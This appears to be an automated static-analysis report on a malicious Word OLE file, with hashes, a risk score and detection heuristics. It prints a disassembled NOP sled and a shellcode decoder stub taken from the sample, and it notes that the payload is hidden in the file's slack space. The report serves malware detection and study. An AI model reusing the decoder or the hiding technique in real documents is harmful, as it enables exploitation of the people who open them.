Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 862fc451d368d81c…

MALICIOUS

Office (OLE)

116.4 KB Created: 2007-09-18 04:34:00 Authoring application: Microsoft Word 11. First seen: 2015-09-18
MD5: 5aeae31d47cc8823a6cdd6dd890f02a0 SHA-1: 64f0c72dfbad690f9bcf98c9b205ff9f6917fde9 SHA-256: 862fc451d368d81cafe5ce5e01f442c07d3145c8c1951ceafdcc0471105182ce
80 Risk Score

Malware Insights

The presence of a NOP sled and significant slack space within the OLE document suggests the file likely contains obfuscated or packed malicious code, possibly shellcode. While no specific document body content or scripts were clearly extracted, these structural anomalies are strong indicators of malicious intent, potentially for exploitation or payload delivery. The SHA256 hash is included as a primary IOC.

Heuristics 2

  • NOP sled detected high SC_NOP_SLED
    Found 20+ consecutive 0x90 bytes
    Disassembly
    Attempted x86 opcode disassembly
    00000C30  90                nop
00000C31  90                nop
00000C32  90                nop
00000C33  90                nop
00000C34  90                nop
00000C35  90                nop
00000C36  90                nop
00000C37  90                nop
00000C38  90                nop
00000C39  90                nop
00000C3A  90                nop
00000C3B  90                nop
00000C3C  90                nop
00000C3D  90                nop
00000C3E  90                nop
00000C3F  90                nop
00000C40  90                nop
00000C41  90                nop
00000C42  90                nop
00000C43  90                nop
00000C44  90                nop
00000C45  90                nop
00000C46  eb03              jmp 0xc4b
00000C48  5e                pop esi
00000C49  ffe6              jmp esi
00000C4B  e8f8ffffff        call 0xc48
00000C50  40                inc eax
00000C51  48                dec eax
00000C52  90                nop
00000C53  33c9              xor ecx, ecx
00000C55  66b90a01          mov cx, 0x10a
00000C59  90                nop
00000C5A  83c619            add esi, 0x19
00000C5D  56                push esi
00000C5E  8bfe              mov edi, esi
00000C60  ac                lodsb al, byte ptr [esi]
00000C61  90                nop
00000C62  c0c004            rol al, 4
00000C65  aa                stosb byte ptr es:[edi], al
00000C66  49                dec ecx
00000C67  75f7              jne 0xc60
00000C69  c3                ret
00000C6A  55                push ebp
00000C6B  b8ce38cec5        mov eax, 0xc5ce38ce
00000C70  3565757c54        xor eax, 0x547c7565
00000C75  0f4000            cmovo eax, dword ptr [eax]
00000C78  0000              add byte ptr [eax], al
00000C7A  099e7d000000      or dword ptr [esi + 0x7d], ebx
00000C80  f8                clc
00000C81  54                push esp
00000C82  cf                iretd
00000C83  46                inc esi
00000C84  1a03              sbb al, byte ptr [ebx]
00000C86  0000              add byte ptr [eax], al
00000C88  00b804c0b807      add byte ptr [eax + 0x7b8c004], bh
00000C8E  c1                .byte 0xc1
00000C8F  da                .byte 0xda
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 119,152 bytes but its declared streams total only 16,486 bytes — 102,666 bytes (86%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Open this report in the interactive analyzer, or submit your own file for analysis.